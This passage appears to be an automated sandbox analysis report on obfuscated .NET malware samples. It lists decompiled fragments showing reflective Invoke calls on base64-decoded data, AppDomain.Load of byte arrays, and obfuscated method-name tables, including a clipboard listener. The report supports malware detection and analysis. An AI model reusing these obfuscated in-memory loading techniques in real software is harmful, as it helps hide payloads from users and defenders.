                                        Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                        Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
                                        Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
                                        Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
                                        Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E7E708 push ds; retf 2_2_00E7E7EB
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E76A22 pushfd ; retf 2_2_00E76A23
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exeCode function: 2_2_00E70C55 push edi; retf 2_2_00E70C7A
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeCode function: 3_2_00007FF848F2A27D push ebx; retn 0009h3_2_00007FF848F2A3CA
                                        Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exeCode function: 3_2_00007FF848F200BD pushad ; iretd 3_2_00007FF848F200C1
                                        Source: FB_7D21.tmp.exe.0.dr, lYfWlfT3r7Vqz88tbfAuCjKRe.csHigh entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
                                        Source: FB_7D21.tmp.exe.0.dr, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
                                        Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.csHigh entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
                                        Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.csHigh entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
                                        Source: FB_7D21.tmp.exe.0.dr, jK41xlYzptzDvBwid77hpLBxe.csHigh entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
                                        Source: FB_7D21.tmp.exe.0.dr, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.csHigh entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
                                        Source: FB_7D21.tmp.exe.0.dr, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
                                        Source: FB_7D21.tmp.exe.0.dr, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.csHigh entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
                                        Source: FB_7D21.tmp.exe.0.dr, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
                                        Source: FB_7D21.tmp.exe.0.dr, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.csHigh entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
                                        Source: FB_7D21.tmp.exe.0.dr, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.csHigh entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
                                        Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csHigh entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
                                        Source: FB_7D21.tmp.exe.0.dr, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.csHigh entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, lYfWlfT3r7Vqz88tbfAuCjKRe.csHigh entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.csHigh entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, hMY5B4KaPYBa602NktZ1e4wVF.csHigh entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, jK41xlYzptzDvBwid77hpLBxe.csHigh entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.csHigh entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
                                        Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
